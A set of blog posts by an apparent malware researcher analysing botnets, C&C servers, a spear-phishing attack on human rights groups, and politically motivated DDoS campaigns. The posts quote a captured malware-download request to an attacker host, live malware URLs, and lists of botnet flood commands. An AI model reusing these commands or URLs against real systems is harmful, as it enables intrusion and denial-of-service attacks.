Posts tagged “Malware”

Traffic Direction Systems



Traffic Direction Systems (TDS) are used as landing pages that direct traffic to malicious content based on a variety of criteria such as operating system, browser version and geographic location. There are a variety of TDS systems available including Sutra TDS (www.kytoon.com/sutra-tds.html). Finjan posted an interesting analysis of one campaign (it no longer appears to be available) in which they tracked the use of the TDS through from the use of a malicious iframe embedded in a compromised website to an exploit pack that attempts to compromised the user based on the types of (vulnerable) software the user has installed.

The statistics pages of some of sites using SUTRA TDS (home-sd.com, sutbizka.ru and new-xmading.ru) were retrieved from the Google cache.

home-sd.com (stolencinema@hotmail.com)

sutbizka.ru (riko246@bk.ru)

new-xmading.ru (riko246@bk.ru)

I found it interesting that the highest percentage of traffic to sutbizka.ru and new-xmading.ru was from Russia. The top referrers were generally porn sites and pay-per-click sites. Pay-per-click sites are an important part of converting botnet traffic into income. In a great two-part post (Making a Million, Part One—Criminal Gangs, the Rogue Traffic Broker, and Stolen Clicks and Making a Million, Part Two—The Scale of the Threat) Trend Micro explores the relationship between these pay-per-click traffic brokers, click fraud and botnets.

Two of the top referrers to sutbizka.ru and new-xmading.ru were pay-per-click brokers media-click.ru and protizer.net.

Now, its not entirely clear what activities home-sd.com, sutbizka.ru and new-xmading.ru are engaged in, but some additional searches revealed connections with malicious activity.

For example, the email address used to register home-sd.com (stolencinema@hotmail.com) was also used to register sespeed.info which Malware URL has linked to the distribution of RogueAV/FAKEAV software. The email address used to register sutbizka.ru and new-xmading.ru (riko246@bk.ru) has been linked to several trojans by MalwareDomainList.com.

While there are malicious activities associated with common IP addresses and email addresses it is important to note that the details of linkages between all the activities remain unclear. Domain names registered with one email address maybe sold to or used by someone else. Moreover, many malicious sites may be hosted on a single IP address especially when one can purchase crimeware-friendly hosting. So, while the activity can be located within concentrations of malicious activity, and it makes sense to cluster this activity, it is important to remember that there are complex linkages between criminal actors in the malware ecosystem.

The Ambler Botnet



[UPDATED to include makeithappen2ce.info and zhogdiana.info]

In the past, the operators of large botnets sought to expand the size of their operations and cared little for the details of any individual compromised computer — one bot was as good, for the most part, as any other. Any one of the thousands of computers under their control could be used to send spam or participate in a denial of service attack. But now not all compromised computers are of equal value to botnet operators. As the focus of botnet activity becomes increasingly extractive — with an emphasis on stolen credit card numbers, credentials and private information — the geographic location of compromised computers has become an important factor for botnet operators. The geographic origin or stolen credit cards, or “dumps”, for example, is an important factor in pricing.

Geographic location is also important when botnet operators attempt to monetize their operations. The various compensation rates for pay-per-click and pay-per-install schemes — especially RogueAV/FAKEAV — are specific to the geographical location of the victim. Some of these schemes even restrict propagation in certain countries. There are botnets with victims that are highly concentrated by geographic location as well as targeted efforts to propagate botnets within specific regions.

This development may also be an effort by botnet operators to improve their operational security in response to the efforts by security researchers. As the risk of “take down” increases, botnet operators may be partitioning their operations to minimize the damage. As Dancho Danchev explains, this may also obscure the work of a single group by making it appear as if these disparate operations are the work of many unaffiliated groups.

The Ambler botnet is based on a trojan, Win32/Ambler, that has been actively spreading since at least October 2008. There are a variety of Win32/Ambler variants and many command and control servers. Win32/Ambler itself is a keylogger — malware that captures the keystrokes entered on a compromised computer — but also specifically targets those that use the online banking services of Bank of America. Win32/Ambler is also often found bundled with other malware.

The following post is the result of an investigation of six command and control servers – dertoplon.com, myhammers.org, sokam.info, sosanni.com and makeithappen2ce.info and zhogdiana.info – associated with Win32/Ambler. From these servers 1.8 gigabytes of data was collected. This data contains sensitive and private information from 11,251 compromised computers (38,920 unique IP addresses). It is not clear to me if the operators of these command and control servers are connected to each other, or if they are four separate botnets that happen to be using Win32/Ambler. Three of the C&C’s are hosted in China, and three are hosted in the US.

Geographic focus
These six control servers appear to be very focused with the vast majority of compromises in Italy, Russia and the United Kingdom, with one C&C focusing on the US. The majority of the compromised computers checking in with dertoplon.com’s two Ambler installations are from Italy (and the ones detected as EU may be Italian as well.) Those checking in with sokam.info and sosanni.com are almost entirely Russian. The compromised computers checking in with myhammers.org are mostly from the US. Finally, those checking in with makeithappen2ce.info and zhogdiana.info are primarily from the United Kingdom. There appears to be an effort to segment compromised computers at the country level among these command and control servers.

IP’s vs. Hosts
Estimating botnet size is not simply counting IP addresses. When looking at IP addresses, 38,920 unique IP addresses were found. But when counting the unique identifiers the malware assigns to each machine, the actual size of the botnet is 11,251 compromised machines. And even that number contains all machines that “checked in” with the C&C. It may include machines that are no longer compromised or no longer exist. The timestamps associated with the capture of information range from 04/16/2010 to 08/08/2010.

Captured data
The keylogger captured the keystrokes typed by the user as well as the location of the resource into which the the users entered the information. As a result broad range of content was captured including logins and passwords to email accounts, ftp accounts social networking sites and corporate and government web portals. The text of what users were searching for in search engines as well as chat conversations were also captured.

Two malware samples were found on the command and control servers:

The malware connects to the command and control server and a text file is created for each individual compromised computer. Captured information, primarily keystrokes, is uploaded and stored in these text files. There are some specific tags that delineate types of data. For example, “****BOAEMAIL****” and “****BOAQUES****” are used to identify the email address and answers to security questions for Bank of America (BOA) online banking clients. It also retrieves any stored information in protected storage, such as passwords, and marks it with “*******PROTECTED STORAGE*******” in order to identify it. the files also contain a listing of file paths for specified directories “****GETFILE PATHS****” as well as a list of the volumes available “****VOLUMES LIST****”. This allows the botnet operators to target specific files and directories for extraction.

The details for each command and control server are displayed below.

dertoplon.com (edgar.marcha@verizon.net)
(dertoplon.com had two instances of the Ambler command and control backend at different directory locations).

www.dertoplon.com has address 113.11.194.148
inetnum: 113.11.192.0 – 113.11.223.255
netname: DIGILAND
descr: Beijing Digiland media technology Co. Ltd
descr: Apt2 No5 Jinyuanzhuang AVE shijingshan district Beijing
country: CN


myhammers.org (privacy@pipedns.com)

myhammers.org has address 69.175.75.250
NetRange: 69.175.0.0 – 69.175.127.255
CIDR: 69.175.0.0/17
OriginAS: AS32475
NetName: SINGLEHOP
Country: US


sokam.info (ptrsimk@gmail.com)

www.sokam.info has address 121.101.216.195
inetnum: 121.101.208.0 – 121.101.223.255
netname: SUNINFO-MDC
descr: Beijing Sun Rise Technology CO.LTD
descr: Tedatimes Center, Suite 1908, Tower4, No.15 Guanghua Road,
descr: Chaoyang District, Beijing, 100026, PRC
country: CN


sosanni.com (migray71@yahoo.com)

sosanni.com has address 121.101.216.205
inetnum: 121.101.208.0 – 121.101.223.255
netname: SUNINFO-MDC
descr: Beijing Sun Rise Technology CO.LTD
descr: Tedatimes Center, Suite 1908, Tower4, No.15 Guanghua Road,
descr: Chaoyang District, Beijing, 100026, PRC
country: CN


makeithappen2ce.info (givin4ik69@mail.ru)

makeithappen2ce.info has address 72.232.203.93
OrgName: Layered Technologies, Inc.
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US


zhogdiana.info (givin4ik69@mail.ru)

zhogdiana.info has address 72.232.203.92
OrgName: Layered Technologies, Inc.
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US


In order to get a sense of the crimeware neighbourhood in which these control servers reside, malwaredomainlist.com is a great resource that can be used to identify other malicious domain names registered with the same email address and other domain names hosted on the same IP address.

The email addresses edgar.marcha@verizon.net and migray71@yahoo.com used to register dertoplon.com and sosanni.com were also used to register a variety of domain names that are hosting ZeuS elements as well as the Eleonore, Phoenix and Nuclear exploit kits. The IP addresses 113.11.194.148, 121.101.216.195 and 121.101.216.205 are also hosting a variety of malware including ZeuS, Russkill and YES exploit kit.

This does not mean that all of these activities are directly connected, but rather, that these activities are taking place within a malware ecosystem designed to maintain and monetize the operations of botnets. Botnets often rely on crimeware friendly hosting services, so it is not uncommon to see malicious activity concentrate around particular servers or networks. However, it does indicate that the botnet operators are connected with the malware ecosystem and leveraging the services offered within it to sustain and monetize their operations.

Human Rights and Malware Attacks



Human Rights and Malware Attacks

by Nart Villeneuve

On March 18, 2010, unknown attackers sent a spear phishing email that appeared to be from Sharon Hom, the Executive Director of Human Rights in China (HRIC), to a variety of organizations and individuals. Leveraging the trust and recognition of HRIC, the attackers’ email encouraged recipients to visit a compromised website that contained malicious code designed to allow the attackers to ultimately take full control of the visitor’s computer. These targeted malware attacks are now becoming commonplace, further extending the threat faced by civil society organizations.


UPDATE

One of the domains used in this attack, humanright-watch.org, has been used in a variety of attacks and has been documented by Mila at contagiodump.blogspot.com.


Introduction

Internet censorship is but one component of “a matrix of control” that acts to restrict and control information flow in China. The combination of censorship along with surveillance aims to influence behavior toward self-censorship so that most will not actively seek out banned information, let alone the means to bypass these controls. Those engaged in political activities and those who vocally oppose repressive policies such as censorship may be subjected to a complex set of threats—not simply censorship.

A 2008 report titled Breaching Trust: An Analysis of Surveillance and Security Practices on China’s TOM-Skype Platform uncovered that Skype and its Chinese partner Tom Online operated a surveillance network which insecurely captured millions of records including contact details for any text chat and/or voice calls and the full text of sensitive chat messages. A large portion of these captured messages concerned a political campaign that urged Chinese citizens to quit the Communist Party.

There have been an increasing number of targeted malware attacks against civil society organizations, human rights groups, media organizations, and Tibetan supporters. Typically, the targeted user receives an email, possibly appearing to be from someone they know who is a real person within his or her organization, with some text—sometimes specific, sometimes generic—that urges the user to open an attachment (or visit a web site), usually a PDF or Microsoft Office document .

If the user opens the attachment with a vulnerable version of Adobe Reader or Microsoft Office (other types of software are also being exploited) and no other mitigations are in place, their computer will likely be compromised. A clean version of the document is typically embedded in the malicious file and is opened upon successful exploitation so as not to arouse suspicion of the recipient.

Then the user’s computer checks in with a command and control server. At this point, the attacker has full control of the user’s system. The attacker can steal documents, email and send other data, or force the compromised computer to download additional malware and possibly use the infected computer as a mechanism to exploit the victim’s contacts or other computers on the target network.

In the last year, the Information Warfare Monitor has uncovered two cyber-espionage networks, investigated numerous targeted malware attacks, and published two reports: Tracking GhostNet: Investigating a Cyber Espionage Network and Shadows in the Cloud: An Investigation into Cyber Espionage 2.0.

The first, GhostNet, was a network of over 1200 compromised computers spread across 103 countries, 30 percent of which we identified and determined to be “high-value” targets, including ministries of foreign affairs, embassies, international organizations, news organizations, and a computer located at NATO headquarters. While we were able to determine that these entities had been compromised, we were only able to theorize about what type of data the attackers were able to acquire.

Our follow-up investigation uncovered the Shadow Network, and unlike GhostNet we were able to acquire the data stolen by the attackers. We were able to access just one portion of the Shadow Network that was primarily focused on extracting sensitive information from India. We recovered a wide variety of documents, including one document that appeared to be encrypted diplomatic correspondence, two documents marked “SECRET,” six as “RESTRICTED,” and five as “CONFIDENTIAL” which appear to belong to Indian government entities including the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

The nature of the compromised entities and the data stolen by the attackers do indicate correlations with the strategic interests of the People’s Republic of China, but, we were unable to determine any direct connection between these attackers and elements of the Chinese state.

Investigation

Summary

On March 18, 2010, attackers sent a “spear phishing” email that appeared to originate from Sharon Hom’s email account to several different organizations and individuals. The subject of the email was “Microsoft, Stool Pigeon for the Cops and FBI” and the email contained a JPG attachment. However, the attackers’ objective was for the targets to visit the link contained in the email. The link, www.cfcr2008.org, redirected to cfcr.i1024.com which was compromised by the attackers and in which they had inserted code that caused visitors to the website to open a malicious PDF from www.520520.com.tw. This PDF exploited Adobe Reader and compromised the visitors computer. Compromised computers then connected to a website under the attackers’ control, www.humanright-watch.org, and downloaded additional malware before ultimately connecting to a command and control server, 360liveupdate. com, in China.

Spoofed Email

From: Sharon Hom <mailto:sharonhom@hrichina.org>
To
: [REDACTED]
Sent: Thursday, March 18, 2010 9:46 AM
Subject
: Microsoft, Stool Pigeon for the Cops and FBI

 

I’ve got my hands on a copy of the leaked, confidential Microsoft “Global Criminal Compliance Handbook,” which details for police and intelligence services exactly what information Microsoft collects about users of its online services, and how they can be accessed. What is gathered and available about you is quite comprehensive, including your emails, detailed information about when you sign in and use the services, credit card information, and so on. Attachments are scanned copies of documents.

For the whole documents, please visit http://www.cfcr2008.org

Email Headers

Although the email appeared to be from HRIC it was actually sent from the following location:

Sender: selina@avghost.net <mailto:selina@avghost.net>
Received
: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]

 

The email headers reveal that the attackers actually sent the email from the following IP address:

208.77.45.130
OrgName: DCS Pacific Star, LLC
OrgID: DCSPA
Address
: 5050 El Camino Real, #238
City: Los Altos
StateProv: CA
PostalCode
: 94022
Country: US

The email encouraged recipients to visit cfcr2008.org, the website of an organization called the Coalition for Citizen’s Rights. This organization is a vocal opponent of the Chinese government.

The attackers compromised the website and inserted malicious code that caused vulnerable visitors to silently load a malicious PDF document that infected the users computer with malware.

Image 1 Compromised site: cfcr2008.org -> cfcr.i1024.com

Image 2 js_men.asp

The malicious PDF was hosted on www.520520.com.tw (203.69.42.41), a website located in Taiwan. This malicious file has very low antivirus coverage. Only eight out of forty-two anti-virus products detected the file as malware.

Item 3

Filename readme.pdf
Filetype PDF
CVE ?
MD5 72bdca7dd12ed04b21dfa60c5c2ab6c4

Virustotal: 8/42 (19.05%)
http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11addfa9b4c5a1bb9247243a443a4b1-1269343609

http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7dfe&t=1269304734&type=js

The malware dropped by the malicious PDF issued another connection, this time to www.humanright-watch.org (204.16.193.39). This is a server under the control of the attackers. The malware made a request for another executable, which appeared to be encrypted and which no antivirus products detected as malicious.

Item 4

GET /fun.exe HTTP/1.1
Host: www.humanright-watch.org

Filename fun.exe
Filetype EXE
CVE ?
MD5 ec16143a14c091100e7af30de03fce1f

Virustotal: 0/42 (0%)
http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772dfbb2b7d2aa0425b5f8e03b2f1f-1269343660

Interestingly, the IP address of www.humanright-watch.org (204.16.193.39) is assigned to the same company, DCS Pacific Star, LLC, as the IP address used to send the malicious email (208.77.45.130).

The new malware downloaded from www.humanright-watch.org (204.16.193.39) began encrypted communications with a command and control server located in China at 360liveupdate.com(117.85.48.157).

Image 5

The command and control server is located in Jiangsu Province, China:

117.85.48.157
inetnum
: 117.80.0.0 – 117.95.255.255
netname
: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr
: Beijing 100088
country
: CN

Conclusion

The nexus of censorship, surveillance, and malware attacks enable strict information control policies in China that extend beyond China’s boundaries to affect civil society organizations around the world. An increasing number of targeted malware attacks against civil society organizations are being reported. In many cases, the attacks can be traced back to command and control infrastructure located in China. These attacks leverage trust among members of social and political networks using human rights themes and spoofed identities to encourage targeted users to execute malicious code. From that point, unknown attackers have full control over the users’ computers and can conduct surveillance, exfiltrate sensitive information, and use the computer as a staging ground for future attacks.


The original version of this article is available here and in Chinese here.

A Random Walk Through the Malware Ecosystem



The forum at darkcc.com is a location where buyers and sellers of stolen credit card information conduct exchanges. There are many forums like this that are part of the thriving market that sustain the “botnet ecosystem.” The servers that host these types of forums are typically involved in a variety of nefarious activities. This one hosts a variety of malicious software:

www.sokam .info /admnew2/Dr.exe (VT: 33/40 (82.50%)
infoshok .info /exe.php?606717496665bcba (VT: 20/40 (50.00%))
superhomelawn .com /per4d/load/load.exe (VT: 5/41 (12.20%))
senders2010 .com /sites/up.bin (zbot/zeus)
keroholek .net /tt/stat/index.php (zbot/zeus)
newdaypeace .org /npd2e/bb.php?… (oficla/sasfis)

The sites are hosted on 121.101.216.195 – SUNINFO-MDC which is located in China.

One “trusted” seller (meaning that the forum administrator had vouched for him/her) known as mrdump caught my attention. mrdump’s minimum order is now $1000 USD. In addition to advertising his/her services on the forum, mrdump included his/her website, mrdump.biz.

The site is hosted on 121.101.216.205 – SUNINFO-MDC in China and, as usual, these a fair amount of nasty stuff, mostly zeus/zbot (heroladaaw.biz, ddkom.biz, herakert.net) hosted on the same server. Another zeus/zbot command and control server found on the same server is: www.kalekets.net/tt/cfg/config.bin

There is also a BlackEnergy command and control server hosted on the same server: sinergy-dl.com. It was a fairly small botnet (total bot’s: 171, bot’s per hour: 213, bot’s per day:437, bot’s for all time:1816) and was issuing the following command “flood http kirbyservice.ru” — instructing the bots to DDoS kirbyservice.ru. Recently, the command has been changed to “die”.

One interesting find pertains to the rivalry between Zeus and SpyEye. The same server hosts www.coolparts31.tw which is a known zeus/zbot command and control server. Well it turns out that it is also a Spy Eye command and control server:

www.coolparts31.tw/S_main/bin/upload/build.exe (27/41 (65.85%))
www.coolparts31.tw/S_main/bin/upload/33.exe (VT: 10/41 (24.4%))
www.coolparts31.tw/S_main/bin/upload/server.exe (VT: 35/41 (85.37%))
www.coolparts31.tw/S_main/bin/upload/server12.exe (VT: 35/40 (87.5%))
www.coolparts31.tw/S_main/bin/upload/xServer.exe (VT: 8/40 (20%))

I recall someone (I am pretty sure it was Dancho Danchev — UPDATE: and it was here and here (thx @danchodanchev)) — reacting to this rivalry by saying that the criminals don’t really care, they’ll use any malware kit that works.

Or something like that.

Sometimes, we get sidetracked by the tools, but it’s the crime that pays.

Thanks for the malware



I checked inbox today and found an interesting email:
More… »

Blurring the Boundaries Between Cybercrime and Politically Motivated Attacks



An emerging area of inquiry in security research is the blurring boundaries between cybercrime and other, more targeted forms of attack, and more specifically attacks that appear to be politically motivated. These attacks often take the form of targeted malware attacks that act as a form of surveillance in which sensitive documents and communications are captured from the targeted organizations and individuals or politically motivated Denial of Service attacks that aim to punish, disrupt and/or censor the ability of the targets to communicate to the world.

One of the themes that informed the “Shadows in the Cloud” report was the (potential) relationship between crimeware networks and cyber-espionage. The boundaries between the two appear to be blurring making issues of attribution increasingly more complex. It may also indicate that there is an emerging market for sensitive information and/or politically motivated attacks as crimeware networks seek to monetize such information and capabilities.

I explored this theme in a report on a case related to Kneber botnet documented by NetWitness in which a known ZeuS-based botnet, typically used to steal banking information and other credentials, was specifically targeting .mil and .gov email addresses with spearphishing attacks and then dropping a second piece of malware, an infostealer, on the compromised systems that uploaded sensitive documents to a drop zones in Belarus and Russia. This botnet was engaged in all sorts of other malicious activity associated with cybercrime.

When it comes to DDoS attacks a similar pattern is observed. Jose Nazario of Arbor Networks wrote a very interesting paper that analyzed politically motivated DDoS attacks (and is basically the inspiration for this blog post). The numerous DDoS attacks described in this paper are very interesting, some are punitive attacks others appear to be an effort to censor political speech (something I worked on at ONI in the past with Kyrgyzstan in 2005 and Belarus in 2006). In the paper Nazario dicusses the role that well known BlackEnergy-based botnets played in the DDoS attacks on Georgian websites during the Russia-Georgia conflict in 2008. In a really amazing presentation Jose Nazario and Andre DiMino of Shadowserver document the attacks on Georgia. But what is most interesting, in this context, are the other unrelated targets that the same botnets also attacked. The RU-GE case is a great example of the blurring boundaries between crimeware networks, politically motivated attacks a censorship.

On a much smaller scale, I observed some recent attacks in which a BlackEnergy-based botnet attacked a variety of unrelated targets but eventually attacked political websites. The botnet was discovered while analyzing data captured from the computer of a Tibetan political figure. Due to the character of the network Greg Walton and I concluded that the attack was not targeted and was not related to the Tibet or to the political activities of the individual who was compromised. However, I continued to monitor the botnet.

The botnet had two command and control domain names 091809.ru and sexiland.ru both hosted on the same IP address (210.51.166.238, China Netcom). The command and control interface was not password protected and I was able to access it and determine the size of the botnet. According to the statistics in the interface, 091809.ru had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the 091809.ru recorded 64346 infections. According to the statistics in the interface, sexiland.ru (210.51.166.238) had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the sexiland.ru recorded 51813 infections. This is not a particularly large botnet at all, but the attackers could access at least 6000 bots at any given time.

This botnet attacked a variety of websites, however, four of them caught my attention.

1. bachuna.net

2009-12-15 05:00:01
flood http bachuna.net

The attackers began flooding bachuna.net on 2009-12-15. The attacks appear to relate to Ukrainian news stories (here, here, here and here) which broke around the same time as the attacks started involving a judge named Oleg Bachun and two competing websites bachuna.net and bachun.net. While the former was supportive of the judge the latter implicated him in illegal activities. Since I am relying on Google Translate it would be great of some Russia and Ukrainian speakers could provide a more in-depth assessment of what happened in the case as well as to the domain names involved as it appears from the reports that bachun.net was transfered to the owner of bachuna.net.

2. ingushetiyaru.org

2010-01-16 18:00:01 – 2010-01-20 06:00:02
flood http www.ingushetiyaru.org

Rights in Russia reported that “a website run by an opposition group in Ingushetia, Ingushetiyaru.org, suffered a DDoS attack after publishing comments critical of the region’s authorities.” Ingushetia is located near Chechnya and is a politically sensitive area. Ingushetiyaru.org reported the DDoS on their livejournal site and the broader implications in this article. This is not the first time there have DDoS attacks related to this region. Jeff Carr reported on another DDoS attack and implicated the RBN in the attack.

3. angusht.com

2010-01-22 12:00:01 – 2010-01-26 15:00:02
flood http angusht.com

This website, angusht.com, is also related to Ingushetia and reported DDoS attacks (here too) earlier this year. Several other related sites were also reported to be inacessible. The timing of the inaccessibility of the sites and the DDoS attacks on angusht.com and ingushetiyaru.org also correlate with reports of an explosion of a gas pipeline in Ingushetia.

4. kadyrov2012.com

2010-01-25 08:00:02 – 2010-01-27 02:00:01
flood http kadyrov2012.com

The website kadyrov2012.com was a satirical website claiming that the Russian-backed Chechen leader Ramzan Kadyrov was going to run in for president in Russia’s elections. Reuters reported the story on January 24 which correlate with the timing of the DDoS attacks.

These attacks are fairly small when compared with others and fly under the radar screen of most. They show that small scale attacks designed to censor opposing views occur with frequency against key websites and during critical time periods. It is clear that those engaged in political activities and those who vocally oppose repressive policies such as censorship may be subjected to a complex set of threats from targeted malware through to DDoS and not simply censorship in the form of Internet filtering. Finally, these attacks demonstrate that botnets involved with criminal activity are being used to conduct both political and apolitical DDoS attacks

Sites DDoS’d by this botnet:

flood http 195.216.243.39
flood http 208.64.123.225
flood http 213.155.12.120
flood http 217.107.35.35
flood http 217.17.158.55
flood http 217.20.163.4
flood http 62.149.24.2
flood http 72.20.34.140
flood http 80.93.54.57
flood http 82.146.43.3
flood http 89.108.126.2
flood http 94.198.51.216
flood http angusht.com
flood http angusht.com index.php
flood http angusht.com personal subscribe subscr_edit.php
flood http antiddos.org
flood http asterios.tm
flood http asterios.tm index.php
flood http asteriys.com index.php?f=stat&act=online&server=0
flood http attackers.ru
flood http bachuna.net
flood http bankunet.com
flood http barbars.ru
flood http blud.net
flood http carderfix.ru
flood http carder.info
flood http carder.info index.php
flood http carder.info,l2.theonline.ru
flood http carder.su
flood http carder.su showgroups.php
flood http ddef.ru
flood http do-finance.com
flood http fan-age.ru,l2.exsade.com,forum.exsade.com,final-zone.ru
flood http filebase.to
flood http forum.notebook812.ru
flood http forum.timesgame.ru,timesgame.ru
flood http internet-guard.net index.php
flood http kadyrov2012.com
flood http kadyrov2012.com
flood http kadyrov2012.com index
flood http karyatour.com.ua
flood http l2jfree.com
flood http la2.100nt.ru
flood http la2.timesgame.ru
flood http lineage.cn.km.ua
flood http ll2.su
flood http meridian-express.ru
flood http modcam.ru
flood http notebook812.ru
flood http notebook812.ru
flood http ohah.ru
flood http ohah.ru index.php
flood http planety-hackeram.ru
flood http portal27.ru
flood http pupsa.net
flood http rodi.ru
flood http rosban.su
flood http sever.ru
flood http slineage.ru
flood http smsdeal.ru index.php
flood http takwap.ru
flood http takwap.ru 111 XXX_DETKA
flood http takwap.ru 157 xxx ohah.ru
flood http teamsteam.ru
flood http vpotoke.com
flood http wapfan.org index.php
flood http wow.cln.ru
flood http www.2simtv.ru index.php
flood http www.angusht.com index.php
flood http www.art-taxi.ru
flood http www.glazey.ru
flood http www.ingushetiyaru.org
flood http www.notebook812.ru
flood http www.prado-club.su
flood http www.prado-club.su forum
flood http www.ripoffreport.com
flood http xaknet.ru
flood icmp forum.antichat.ru
flood syn www.ripoffreport.com 80

Shadows in the Cloud



Last year, at just about this time, the InfoWar Monitor (IWM) released the “Tracking GhostNet” report which detailed our investigation into a cyber-espionage network that has compromised 1200+ computer systems spread across 103 countries, including ministries of foreign affairs, embassies, international organizations, news organizations, and even a computer located at NATO headquarters.

I remember when I stumbled upon the GhostNet attacker’s command and control interface by Googling a string of text from the network traffic obtained during our field investigation from a compromised computer at the Dalai Lama’s office in Dharamsala , India. To my surprise Google returned several results, which I clicked, and was suddenly looking at an interface that allowed the attackers to fully control a network of compromised computer system. When the report came out and I realized the significance of the find I thought that there was no way it would happen again. I was wrong.

Today the IWM and the Shadowserver Foundation have released a report “Shadows in the Cloud: An investigation into cyber espionage 2.0” (mirror) in which we document another targeted malware network. (NYT coverage here). We started by exploring one of the malware networks described in the GhostNet report but was an entirely separate malware network that had also compromised computers at the Dalai Lama’s office. I cannot stress just how important the trust, collaboration and information sharing across all those involved in this report from the Citizen Lab, SecDev , and Shadowserver, along with the Dalai Lama’s Office were to the success of the project.

As a result we were able to document another network of compromised government, business, and academic computer systems in India, the Office of the Dalai Lama, and the United Nations as well as numerous other institutions, including the Embassy of Pakistan in the United States.

In the report we enumerated a complex and tiered command and control infrastructure. The attackers misused a variety of services including Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. This top layer directed compromised computers to accounts on free web hosting services, and as the free hosting servers were disabled, to a stable core of command and control servers located in China.

This time, unlike GhostNet, we were able to recover data, some of which are highly sensitive, from a drop zone used by the attackers. One day, while exploring open directories on one of the command and control servers I noticed that there were files in a directory that was normally empty. It turned out that the attackers were directing compromised computers to upload data to this directory; the attackers subsequently moved the data off to another location and deleted the files at fairly rapid, but intermittent time intervals.

We recovered a wide variety of documents including one document that appears to be encrypted diplomatic correspondence, two documents marked “SECRET”, six as “RESTRICTED” and five as “CONFIDENTIAL” which appear to belong to the Indian government. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

Based on the character of the documents (and not IP addresses) we assessed that we recovered documents from the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. In addition, we recovered documents from India’s Military Engineer Services (MES) and other military personnel as well as the Army Institute of Technology in Pune, Maharashtra and the Military College of Electronics and Mechanical Engineering in Secunderabad, Andhra Pradesh. Documents from a variety of other entities including the Institute for Defence Studies and Analyses as well as India Strategic defence magazine and FORCE magazine were compromised.

Questions regarding those who are ultimately responsible for this cyber-espionage network remain unanswered. We were, however, able to benefit from a great investigation by The Dark Visitor who tracked down lost33, the person who registered some of the Shadow network’s domain names that we published in the GhostNet report and his connections ot the underground hacking community in China. Based on the IP and email addresses used by the attackers we were able to link the attackers to several posts on apartment rental sites in Chengdu.

This, of course, does not reveal the role of these specific individuals nor the motivation behind the attacks. However, the connection that The Dark Visitor drew between lost33 and the underground hacking community in China does indicate that motivations such as patriotic hacking and cybercrime may have played a role. Finally, the nature of the data stolen by the attackers does indicate correlations with the strategic interests
of the Chinese state. But, we were unable to determine any direct connection between these attackers and elements of the Chinese state. However, it would not be implausible to suggest that the stolen data may have ended up in the possession of some entity of the Chinese government.

Now having reported this incident to the China CERT — which handles security incidents in China — I look forward to working with them to shut down this malware network.

This is an investigation in progress. There are many threads in this investigation that have still to be fully explored. I hope that this report provides enough detail to allow others with different specializations to continue to explore aspects of the Shadow network enriching our collective understanding of this incident and the broader implications regarding both cyber-crime and cyber-espionage.

Vietnam & Aurora



[UPDATE: See “Vecebot Trojan Analysis” by SecureWorks.]

A while back I wrote a post about “Aurora Mess” in which I tried, unsuccessfully, to make sense of the different assessments of the attacks on Google and at least 20 other companies within the security community. I was trying to grapple with the way in which Google and McAfee were characterizing the attacks as sophisticated while Damballa labeled them amateurish and connected them to some common cybercrime activities. Well, it turns out that it was a confusing for a reason. (And is still confusing, check out Damballa’s reaction to “Aurora Lite“)

Some of the domain names included as part of Aurora turned out to be not part of Aurora. McAfee explains:

While originally some of these domains and files had been reported to be associated with Operation Aurora, we have since come to believe that this malware is unrelated to Aurora and uses a different set of Command & Control servers.

Turns out that these domain names (google.homeunix.com tyuqwer.dyndns.org blogspot.blogsite.org voanews.ath.cx ymail.ath.cx), once included as part of Aurora – an attack traced to China — were now traced Vietnam. It looks the domains were erroneously included as part of Aurora because they were discovered during the Aurora investigation:

We suspect the effort to create the botnet started in late 2009, coinciding by chance with the Operation Aurora attacks. While McAfee Labs identified the malware during our investigation into Operation Aurora, we believe the attacks are not related.

Neel Mehta of Google noted that there may be a political dimension to the attacks:

The malware infected the computers of potentially tens of thousands of users who downloaded Vietnamese keyboard language software and possibly other legitimate software that was altered to infect users. While the malware itself was not especially sophisticated, it has nonetheless been used for damaging purposes. These infected machines have been used both to spy on their owners as well as participate in distributed denial of service (DDoS) attacks against blogs containing messages of political dissent. Specifically, these attacks have tried to squelch opposition to bauxite mining efforts in Vietnam, an important and emotionally charged issue in the country.

In terms of the attack vector, McAfee’s Kurtz stated:

We believe the attackers first compromised www.vps.org, the Web site of the Vietnamese Professionals Society (VPS), and replaced the legitimate keyboard driver with a Trojan horse. The attackers then sent an e-mail to targeted individuals which pointed them back to the VPS Web site, where they downloaded the Trojan instead.

To Summarize, from Google and McAfee, we have:

  • Command and control servers are google.homeunix.com tyuqwer.dyndns.org blogspot.blogsite.org voanews.ath.cx ymail.ath.cx
  • The botnet started in late 2009, coinciding with the Aurora attacks, which would make the date mid-December
  • There were targeted attacks that encouraged the download of malicious software from www.vps.org which had already been compromise and was hosting the malware
  • The malware, W32/VulcanBot, was disguised as a Vietnamese keyboard driver
  • This botnet DDoSed sites that opposed a bauxite mine in Vietnam

The website that may have been DDoS’d in connection with the bauxite mine may have been bauxitevietnam.info.

The AP’s Ben Stocking reports that:

Last fall, the government detained several bloggers who criticized the bauxite mine, and in December, a Web site called bauxitevietnam.info, which had drawn millions of visitors opposed to the mine, was hacked.

Stocking also reported:

Vietnam has hired a Chinese company to build the plant to process bauxite taken from the mines and hundreds of Chinese are reportedly working there.

